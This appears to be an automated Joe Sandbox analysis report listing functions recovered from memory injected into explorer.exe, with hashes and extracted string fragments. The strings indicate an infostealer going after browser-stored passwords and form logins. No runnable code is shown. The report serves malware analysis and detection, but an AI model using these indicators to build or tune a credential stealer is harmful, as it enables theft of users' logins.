                                                                                                                                                                                                        • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                                                        • Instruction ID: 973e0c3d55146486e46d1abfb959f4f0e77b14f932cc689031969aa08de74dcc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 823178B4A05B49DFDB55DF298088699B7A5FB94320F48427EC92DCB206CB30A0A4CFD1
                                                                                                                                                                                                        Function 13966412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 453 13966412-13966446 call 13971942 456 13966473-1396647d 453->456 457 13966448-13966472 call 13973c9e CreateThread 453->457
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                                                        • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                                                        • Instruction ID: 2e675a3b5f849c281b20ae41253d5f5ca9474169aaee2e55586e5ffc7ac81508
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1EF0F634268B484FD788EF2CD48563AF3E0FBE9214F45063EE94DC3264DA39D9824B56

                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                        Function 110D6D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                                                                                        • API String ID: 0-393284711
                                                                                                                                                                                                        • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                                                        • Instruction ID: d3c3fc840cd481d9052d172b521052ef9658c9d1488764eae254cf366ced1f2c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FEE15A74A18F488FCB64DF68C4947AAB7E1FB58304F504A2E959FC7245DF30A542CB89
                                                                                                                                                                                                        Function 1167CD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                                                                                        • API String ID: 0-393284711
                                                                                                                                                                                                        • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                                                        • Instruction ID: 7ef7d0cbc8552666bce3a254ef13c89b07680dcff34ca7e2d3a492694994efbb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3DE18874618F488FCB64DF28C484BAAB7E1FB58304F504A2E959FC7255EF30A541CB89
                                                                                                                                                                                                        Function 110D9792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                                                                                        • API String ID: 0-2916316912
                                                                                                                                                                                                        • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                                        • Instruction ID: 0ba788e9e977ad30628503a825525e4dfd30b2296ae500f84f456648da9f95b8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EEB18C30A18B488EDB55EF69C489AEEB7F1FF98304F50491ED49AC7251EF70A405CB86
                                                                                                                                                                                                        Function 1167F792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                                                                                        • API String ID: 0-2916316912
                                                                                                                                                                                                        • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                                        • Instruction ID: 9af89d22d7d4d01e3a5c4fa6387dcc920bc566e3a2b9914cc34d9a0e8de77bb0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5CB1BA74518B488ECB19EF68C485AEEB7F2FF98304F40451ED49AC7251EF70A445CB8A
                                                                                                                                                                                                        Function 110D7622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                                                                        • API String ID: 0-1539916866
                                                                                                                                                                                                        • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                                        • Instruction ID: b3e1f0360542e3619761ea2b7fa8eda1b5a8e181b8fcfba60a5f98efeb45b5a1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB41B170B18B488FDF18DF88A4456BD7BE2FB48708F00425ED809D3245DBB5AD458BD6
                                                                                                                                                                                                        Function 1167D622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                                                                        • API String ID: 0-1539916866
                                                                                                                                                                                                        • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                                        • Instruction ID: 0828b791e8a0cf818486bfb608cdef5b201d23de9c26bf1b5123642c2467f2a0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0941E371A18B088FDB14DF88A4467BDBBE2FB58714F00065ED409D3241DBB1AD45CBD6
                                                                                                                                                                                                        Function 110DEAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                                                                        • API String ID: 0-355182820
                                                                                                                                                                                                        • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                                        • Instruction ID: 4a62dc79049344c4d6656b00ab241729fcbb21562868f677acfcaec9aa951bb3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67C15A74A18B099FCB58EF64C489AEAF7E1FF94304F40462E959AC7250DF30B515CB86
                                                                                                                                                                                                        Function 11684AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                                                                        • API String ID: 0-355182820
                                                                                                                                                                                                        • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                                        • Instruction ID: 0094ad14ee6ce88fa6bb8915b6bf5affa29406c9242c371476eb885b0ed479a7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31C17B75218F098FCB58EF28C48569AF7E2FB94308F40472E949AC7250DF71A555CB8A
                                                                                                                                                                                                        Function 110DEF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                                                                        • API String ID: 0-97273177
                                                                                                                                                                                                        • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                                        • Instruction ID: d82e6ecc8611cfeb61494142bc9972c6e91597d55a9b2fbe0073459ec11d529f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC51D674A1C7488FDB09DF18D4852AAB7E5FBC5704F50592EE8CBC7242DBB4A506CB82
                                                                                                                                                                                                        Function 11684F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                                                                        • API String ID: 0-97273177
                                                                                                                                                                                                        • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                                        • Instruction ID: f18e64853f62d8cc95d0e228b92468f7b2c17edeaedf221055808073edb7fd6c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1551F43161C7488FD719CF18C8812AAB7E5FBC5704F501A2EE8CBC7255DBB5A946CB82
                                                                                                                                                                                                        Function 110D82F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                                        • API String ID: 0-639201278
                                                                                                                                                                                                        • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                                        • Instruction ID: 5022030f04d7671b63f3d2328405554d820e45b524d5a582f67c9bb072d5b000
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73C16D74A18B1A4FCB58EF68D455AEAB3E1FF98304F41426E944EC7254DF30AA06CB85
                                                                                                                                                                                                        Function 110D82F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                                        • API String ID: 0-639201278
                                                                                                                                                                                                        • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                                        • Instruction ID: 17d4c05c97fb013ab1cc1ade66f66657e8c7f11d421317815a204649b3ded407
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6C17D74A18B1A4FCB58EF68D455AEAF3E1FF98304F41426E944EC7254DF30AA06CB85
                                                                                                                                                                                                        Function 1167E2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                                        • API String ID: 0-639201278
                                                                                                                                                                                                        • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                                        • Instruction ID: da9a9e23f1a5b3b6425a959ea911349b0ef4eff4e8dd773ef537323f03a4d2d6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3EC19174619F1A4FCB58EF68D455AAAB3E2FB98304F41432DC44AC7254EF31EA05CB89
                                                                                                                                                                                                        Function 1167E2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                                        • API String ID: 0-639201278
                                                                                                                                                                                                        • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                                        • Instruction ID: bcf55690e7997e818653cf13f044a0ac4d707a82f82bdc74271f8964ffd1755b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3BC1A074619F1A4FCB58EF68D495AAAB3E2FB98304F41432DC44AC7254EF31E905CB89
                                                                                                                                                                                                        Function 110D9CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                                        • API String ID: 0-2058692283
                                                                                                                                                                                                        • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                                        • Instruction ID: c851dacc4e95cdbd4205e426834c8529f5cb3648614de3468c3f80b7ff8ecd77
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EDA1AE70A187488FDB19DFA89444BEEBBE1FF88304F40466DE48AD7291EF709546C789
                                                                                                                                                                                                        Function 1167FCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                                        • API String ID: 0-2058692283
                                                                                                                                                                                                        • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                                        • Instruction ID: 21277ebf9adcedc7c9a28a9338d9232e77353bf6252dab804b542d3b896684f8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64A1DF70618B488FDB19DFA89444BEEB7E2FF88304F00462DD48AD7241EF359546C78A
                                                                                                                                                                                                        Function 110D9CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                                        • API String ID: 0-2058692283
                                                                                                                                                                                                        • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                                        • Instruction ID: 7fcd15b5b7c115da5102b9a51f021d7a0d7ddaeb6991f8101b0793dd2bc0f5b8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CC917E70A18B488FDB19DFA8D444BEEBBE1FB98304F40462EE48AD7251EF709545C789
                                                                                                                                                                                                        Function 1167FCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                                        • API String ID: 0-2058692283
                                                                                                                                                                                                        • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                                        • Instruction ID: 8463f4921742b8bc2e8dd4bf0a56c23e22e7029a0ad5a7b63432578d4bf1a111
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7591AD70618B488BDB19DFA8D444BEEB7E2FB88304F00462EE48AD7241EF759556C789
                                                                                                                                                                                                        Function 110D9352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: $.$e$n$v
                                                                                                                                                                                                        • API String ID: 0-1849617553
                                                                                                                                                                                                        • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                                        • Instruction ID: 32a92bc6c3bf0ececb693de4e044aae2734cf923b0a4d0db433cea0ea364ae03
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A719335A18B498FD754DFA8D4887AAB7F1FF54304F00062ED44AC7261EF71E9468B85
                                                                                                                                                                                                        Function 1167F352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: $.$e$n$v
                                                                                                                                                                                                        • API String ID: 0-1849617553
                                                                                                                                                                                                        • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                                        • Instruction ID: c7a357e072c6822e39771978a03b79fefaf6207f251c348336a23ba7e04dafd8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2671B135618B498FD718DFA8C4847AAB7F1FF98304F00062ED45AC7221EF72E9458B86
                                                                                                                                                                                                        Function 110D4C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                                                        • API String ID: 0-1970020201
                                                                                                                                                                                                        • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                                        • Instruction ID: 05c8fe2be11a074286b7d018b237fcc462128cd5621dac17d0aad025c628f3c6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7514FB0918B4D8FDB54DFA4C045AEEB7F1FF68304F40462E989AE7254EF70A5418B89
                                                                                                                                                                                                        Function 1167AC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
